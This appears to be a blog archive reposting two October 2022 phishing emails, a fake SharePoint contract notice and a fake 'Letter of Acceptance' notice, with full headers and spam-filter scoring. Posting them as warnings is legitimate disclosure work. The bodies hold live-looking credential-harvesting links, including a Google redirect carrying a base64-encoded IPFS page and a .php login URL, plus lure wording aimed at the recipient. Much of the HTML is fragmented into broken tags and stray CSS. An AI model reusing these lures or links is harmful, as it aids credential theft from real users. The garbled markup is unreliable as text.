Contract Phish

Posted by Dave Yadallee on
Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Thu, 27 Oct 2022 13:26:00 -0600

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.95 (FreeBSD))

(envelope-from )

id 1oo8VW-000O70-0O

for dave@doctor.nl2k.ab.ca;

Thu, 27 Oct 2022 13:25:38 -0600

Resent-From: The Doctor

Resent-Date: Thu, 27 Oct 2022 13:25:37 -0600

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from [209.87.159.147] (port=42944 helo=host.topwebcoupons.com)

by doctor.nl2k.ab.ca with esmtps (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384

(Exim 4.95 (FreeBSD))

(envelope-from )

id 1oo4MQ-000CRl-Nl

for sales@nk.ca;

Thu, 27 Oct 2022 09:00:04 -0600

Received: from [20.108.161.229] (port=50637 helo=[20.254.45.61])

by host.topwebcoupons.com with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384

(Exim 4.95)

(envelope-from )

id 1oo4Jh-000297-9i

for sales@nk.ca;

Thu, 27 Oct 2022 14:57:08 +0000

From: Contract document-sharepoint 2401807

To: sales@nk.ca

Subject: Reference id=9597656

Date: 27 Oct 2022 14:57:07 +0000

Message-ID: <20221027145707.9D541D2AE5C6A8C2@quiz.smarthomeownersclub.co.uk>

MIME-Version: 1.0

Organization: Foobar Inc.

Content-Type: text/html;

charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

X-AntiAbuse: This header was added to track abuse, please include it with any abuse report

X-AntiAbuse: Primary Hostname - host.topwebcoupons.com

X-AntiAbuse: Original Domain - nk.ca

X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]

X-AntiAbuse: Sender Address Domain - quiz.smarthomeownersclub.co.uk

X-Get-Message-Sender-Via: host.topwebcoupons.com: authenticated_id: prop@quiz.smarthomeownersclub.co.uk

X-Authenticated-Sender: host.topwebcoupons.com: prop@quiz.smarthomeownersclub.co.uk

X-Source:

X-Source-Args:

X-Source-Dir:

X-Spam_score: 7.8

X-Spam_score_int: 78

X-Spam_bar: +++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: Contract Documents on SharePoint for sales@nk.ca Company

Shared Portal



Content analysis details: (7.8 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.1 URIBL_GREY Contains an URL listed in the URIBL greylist

[URIs: sendgrid.net]

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

1.3 RDNS_NONE Delivered to internal network by a host with no rDNS

1.0 PDS_DBL_URL_TNB_RUNON Double-url and To no arrows, from runon

3.3 GOOG_REDIR_NORDNS Google redirect to obscure spamvertised

website + no rDNS

Subject: {SPAM?} Reference id=9597656












(200, 200, 200); border-image: none; width: 536px; color: rgb(34, 34, 34); =

text-transform: none; letter-spacing: normal; overflow: hidden; font-family=

: Arial, Helvetica, sans-serif; font-size: small; font-style: normal; font-=

weight: 400; word-spacing: 0px; white-space: normal; max-width: 640px; orph=

ans: 2; widows: 2; background-color: rgb(255, 255, 255); font-variant-ligat=

ures: normal; font-variant-caps: normal;=20

-webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-de=

coration-style: initial; text-decoration-color: initial;" border=3D"0" cell=

spacing=3D"0" cellpadding=3D"0">






r>











<=

/tr>



=










: 36px; padding-left: 36px; font-family: Roboto, RobotoDraft, Helvetica, Ar=

ial, sans-serif;" colspan=3D"3">
ps://cdn.glitch.com/fa360f05-5254-4e88-8d4d-b21d76ad61d1/logo.png">

n=3D"3">


gb(73, 83, 97); text-transform: none; letter-spacing: normal; font-family: =

"Segoe UI", Helvetica, Arial, sans-serif; font-size: 12px; font-style: norm=

al; font-weight: 400; word-spacing: 0px; white-space: normal; border-collap=

se: collapse; orphans: 2; widows: 2; background-color: rgb(255, 255, 255); =

font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-str=

oke-width: 0px; text-decoration-thickness: initial;=20

text-decoration-style: initial; text-decoration-color: initial;'>

=






padding: 0px; font-family: "Segoe UI", Helvetica, Arial, sans-serif; box-si=

zing: border-box;'>


ollapse: collapse;">

=






ont-family: "Segoe UI", Helvetica, Arial, sans-serif; box-sizing: border-bo=

x;'>


1.3; font-size: 24px; font-weight: normal; margin-top: 6px; margin-bottom: =

2px; box-sizing: border-box;" dir=3D"ltr">  Contract Docu=

ments  




1.3; font-size: 24px; font-weight: normal; margin-top: 6px; margin-bottom: =

2px; box-sizing: border-box;" dir=3D"ltr">    &=

nbsp;on SharePoint for
>




32px; font-size: 24px; max-width: 400px;">
face=3D"Helvetica">sales@nk.ca


er-top-color: rgb(222, 222, 222); border-top-width: 1px; border-top-style: =

solid; background-color: rgb(248, 248, 248);" colspan=3D"3">


ce=3D"Helvetica">
src=3D"https://logo.clearbit.com/nk.ca">


Company Shared Portal




248);" colspan=3D"3">
a">








ding: 20px 4px 20px 20px; border-top-color: rgb(210, 210, 210); border-bott=

om-color: rgb(210, 210, 210); border-left-color: rgb(210, 210, 210); border=

-top-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-t=

op-style: solid; border-bottom-style: solid; border-left-style: solid;">
nt face=3D"Helvetica">


07d9ac8cc71e2271/09488857-8d2c-4418-9a62-fdf70e8a5cb6/225x225.png"><=

/td>


-top-color: rgb(210, 210, 210); border-right-color: rgb(210, 210, 210); bor=

der-bottom-color: rgb(210, 210, 210); border-top-width: 1px; border-right-w=

idth: 1px; border-bottom-width: 1px; border-top-style: solid; border-right-=

style: solid; border-bottom-style: solid; -ms-word-break: break-all; backgr=

ound-color: rgb(255, 255, 255);">
>


border-box;">
    &=

nbsp;INV20221010.PDF

Roboto, RobotoDraft, Helvetica, Arial, sans-serif; background-color: rgb(2=

48, 248, 248);" colspan=3D"3">


ellspacing=3D"0" cellpadding=3D"0">








ht: 20px; font-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif;">=
amily: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; font-size: 12px;"=

>This link will only work for (sales@nk.ca).

center; font-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; bor=

der-top-color: currentColor; border-bottom-color: currentColor; border-top-=

width: medium; border-bottom-width: medium; border-top-style: none; border-=

bottom-style: none; background-color: rgb(248, 248, 248);" colspan=3D"3">


ius: 2px; width: 168px; color: rgb(255, 255, 255); line-height: 40px; font-=

size: 16px; display: inline-block; background-color: rgb(0, 120, 212); text=

-decoration-line: none;" href=3D'https://www.google.com/url?q=3Dhttp://chie=

fking.lylux-uea.com&source=3Dgmail&ust=3D1666929894380000&usg=3DAOvVaw1z6iO=

YyzzkDbQjShWYXw4n#..=3DaHR0cHM6Ly9iYWZ5YmVpYXVvam9iNzZtZGZ5bTNvN2Q1bzZxYXRt=

b2VzYnJtZm4zaDV3c2p1cGp3bDQ3d2hzcG9xbS5pcGZzLnczcy5saW5rL29uZWRyaXZlb2I2Lmh=

0bWwvP3NhbGVzQG5rLmNhI3NhbGVzQG5rLmNh'>Open




Document Phish

Posted by Dave Yadallee on
Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Wed, 26 Oct 2022 18:41:00 -0600

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.95 (FreeBSD))

(envelope-from )

id 1onqx3-000Fyt-Qe

for dave@doctor.nl2k.ab.ca;

Wed, 26 Oct 2022 18:40:53 -0600

Resent-From: The Doctor

Resent-Date: Wed, 26 Oct 2022 18:40:53 -0600

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from [104.238.57.122] (port=61380 helo=lasaulec.nl)

by doctor.nl2k.ab.ca with esmtp (Exim 4.95 (FreeBSD))

(envelope-from )

id 1onqeS-000CBC-Ob

for sales@nk.ca;

Wed, 26 Oct 2022 18:21:49 -0600

Reply-To: belmontrichard0@gmail.com

From: nk.ca

To: sales@nk.ca

Subject: Re: Letter of Acceptance for Contract Ref. No. 2022/ELP/TS/PSAC/4008585(B).

Date: 27 Oct 2022 00:18:46 +0000

Message-ID: <20221027001845.38EE8604EAAA0F60@lasaulec.nl>

MIME-Version: 1.0

Content-Type: text/html;

charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 15.7

X-Spam_score_int: 157

X-Spam_bar: +++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: Your document has been completed COMPLETED DOCUMENT Dear

sales@nk.ca, All parties have completed. Kindly Log-in for Letter of Acceptance

for Contract Ref. No. 2022/ELP/TS/PSAC/4008585(B).



Content analysis details: (15.7 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

2.7 RCVD_IN_PSBL RBL: Received via a relay in PSBL

[104.238.57.122 listed in psbl.surriel.com]

0.0 URIBL_RED Contains an URL listed in the URIBL redlist

[URIs: onlinchsal.com]

1.5 NIX_SPAM RBL: Listed in NIX_SPAM DNSBL (thanks to heise.de)

[104.238.57.122 listed in ix.dnsbl.manitu.net]

1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)

0.2 FREEMAIL_REPLYTO_END_DIGIT Reply-To freemail username ends in

digit

[belmontrichard0[at]gmail.com]

0.9 SPF_HELO_SOFTFAIL SPF: HELO does not match SPF record (softfail)

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

2.4 RAZOR2_CF_RANGE_E8_51_100 Razor2 gives engine 8 confidence level

above 50%

[cf: 100]

0.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%

[cf: 100]

1.7 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)

0.0 T_KAM_HTML_FONT_INVALID BODY: Test for Invalidly Named or

Formatted Colors in HTML

1.3 RDNS_NONE Delivered to internal network by a host with no rDNS

2.5 FREEMAIL_FORGED_REPLYTO Freemail in Reply-To, but not From

0.0 TO_NO_BRKTS_NORDNS_HTML To: misformatted and no rDNS and HTML

only

Subject: {SPAM?} Re: Letter of Acceptance for Contract Ref. No. 2022/ELP/TS/PSAC/4008585(B).




w3.org/TR/html4/loose.dtd">


























; PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-LEFT: 24px; MARGIN: 0px;=

PADDING-RIGHT: 24px">

; PADDING-BOTTOM: 30px; PADDING-TOP: 0px; PADDING-LEFT: 24px; MARGIN: 0px; =

PADDING-RIGHT: 24px">


=3D0 cellPadding=3D0 width=3D"100%" align=3Dcenter border=3D0>






WIDTH: 520px; PADDING-BOTTOM: 36px; TEXT-ALIGN: center; PADDING-TOP: 28px; =

PADDING-LEFT: 36px; MARGIN: 0px; PADDING-RIGHT: 36px' align=3Dcenter> =

=20








; MARGIN: 0px' align=3Dcenter>


PACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FLOAT: none; FONT-WE=

IGHT: 400; COLOR: rgb(255,255,255); FONT-STYLE: normal; TEXT-ALIGN: center;=

ORPHANS: 2; WIDOWS: 2; DISPLAY: inline !important; LETTER-SPACING: normal;=

BACKGROUND-COLOR: rgb(33,78,159); TEXT-INDENT: 0px; font-variant-ligatures=

: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-d=

ecoration-thickness: initial;=20

text-decoration-style: initial; text-decoration-color: initial">Your docume=

nt has been completed









>

; PADDING-TOP: 30px; MARGIN: 0px" align=3Dcenter>


GN: baseline; BORDER-BOTTOM-WIDTH: 0px; COLOR: ; PADDING-BOTTOM: 0px; PADDI=

NG-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP=

-WIDTH: 0px">








FONT-WEIGHT: bold; COLOR: rgb(51,51,51); TEXT-ALIGN: center; MARGIN: 0px; D=

ISPLAY: block; BACKGROUND-COLOR: rgb(255,196,35)' align=3Dcenter>


: baseline; BORDER-BOTTOM-WIDTH: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM:=

0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px;=

BORDER-TOP-WIDTH: 0px; text-decoration-line: none" href=3D"https://onlinch=

sal.com/56F2196/086AB06EB2FB4F3316E67.php" rel=3Dnoreferrer target=3D_blank=

>


IDTH: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM-WIDTH: 0px; COLOR: ; PAD=

DING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 24px; MARGIN: 0px; LINE-H=

EIGHT: 44px; PADDING-RIGHT: 24px; BORDER-TOP-WIDTH: 0px; font-stretch: inhe=

rit">COMPLETED DOCUMENT

COLOR: white; PADDING-BOTTOM: 24px; PADDING-TOP: 0px; PADDING-LEFT: 24px; M=

ARGIN: 0px; PADDING-RIGHT: 24px'>


t; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM-WIDTH: =

0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-L=

EFT: 0px; MARGIN: 0px; LINE-HEIGHT: 20px; PADDING-RIGHT: 0px; BORDER-TOP-WI=

DTH: 0px; font-stretch: inherit">Dear sales@nk.ca,

=




tica, sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: n=

one; COLOR: rgb(34,34,34); FONT-STYLE: normal; MARGIN: 0px; ORPHANS: 2; WID=

OWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IN=

DENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -webk=

it-text-stroke-width: 0px; text-decoration-thickness: initial; text-decorat=

ion-style: initial; text-decoration-color: initial">


PACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FLOAT: none; FONT-WE=

IGHT: 400; COLOR: rgb(51,51,51); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2;=

DISPLAY: inline !important; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(=

255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; font-varian=

t-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: =

initial; text-decoration-style: initial;=20

text-decoration-color: initial">All parties have completed. Kindly Log-in f=

or Letter of Acceptance for Contract Ref. No. 2022/ELP/TS/PSAC/4008585(B).<=

/SPAN>